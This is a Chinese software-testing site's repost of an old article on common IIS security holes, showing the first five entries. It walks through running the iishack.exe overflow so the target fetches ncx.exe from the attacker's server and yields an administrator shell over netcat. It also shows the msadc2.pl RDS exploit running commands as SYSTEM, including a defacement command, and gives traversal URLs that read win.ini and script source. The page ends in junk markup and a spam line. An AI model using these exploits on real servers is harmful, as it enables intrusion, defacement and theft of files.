• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    IIS的十七個常見安全漏洞

    發布: 2007-7-02 21:50 | 作者: admin | 來源: | 查看: 10次 | 進入軟件測試論壇討論

    領測軟件測試網

    1. iis4hack緩沖溢出
    主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

    c:>iishack.exe 80 /ncx.exe

    然后你就使.netcat來連接你要檢測的服務器:

    c:>nc 80
    如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

    2.msadc
    IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help
    [quack@chat quack]$ perl msadc2.pl -h
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    Usage: msadc.pl -h { -d -X -v }
    -h = host you want to scan (ip or domain)
    -d = delay between calls, default 1 second
    -X = dump Index Server path table, if available
    -N = query VbBusObj for NetBIOS name
    -V = use VbBusObj instead of ActiveDataFactory
    -v = verbose
    -e = external dictionary file for step 5
    -u <\hostsharefile> = use UNC file
    -w = Windows 95 instead of Windows NT
    -c = v1 compatibility (three step query)
    -s = run only step
    Or a -R will resume a (v2) command session
    [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/
    -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
    Type the command line you want to run (cmd /c assumed):
    cmd /c
    如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:
    echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

    3.Codebrws.asp
    察看文件源代碼
    http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp


    4.Showcode.asp
    察看文件源代碼
    http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini


    5.Null.htw
    察看文件源代碼
    http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

    [1]     

    延伸閱讀

    文章來源于領測軟件測試網 http://www.kjueaiud.com/


    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備2023014753號-2
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>